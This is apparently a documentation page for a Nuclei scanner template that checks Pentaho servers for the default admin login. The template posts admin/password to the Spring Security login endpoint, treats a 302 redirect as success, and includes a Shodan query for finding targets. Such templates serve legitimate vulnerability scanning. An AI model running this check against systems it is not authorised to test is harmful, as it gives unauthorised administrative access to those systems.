Skip to content

Pentaho Default Login

ID: pentaho-default-login

Severity: high

Author: pussycat0x

Tags: pentaho,default-login

Pentaho default admin credentials were discovered.

id: pentaho-default-login
info:
name: Pentaho Default Login
author: pussycat0x
severity: high
description: Pentaho default admin credentials were discovered.
reference:
- https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
shodan-query: pentaho
product: vantara_pentaho
vendor: hitachi
tags: pentaho,default-login
http:
- raw:
- |
POST /pentaho/j_spring_security_check HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
j_username={{user}}&j_password={{pass}}
attack: pitchfork
payloads:
user:
- admin
pass:
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'pentaho/Home'
- 'JSESSIONID='
condition: and
- type: status
status:
- 302
# digest: 4a0a00473045022004a3c3d0fa0a3db1b705e095fdf7a1e82899152a2c09cd5ecc31f315cb296f17022100c5d46e34b420c4dfc032ac57e0f803076f55cb3d9c40ca8ef7fd4d36b4bc6205:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/pentaho/pentaho-default-login.yaml"

View on Github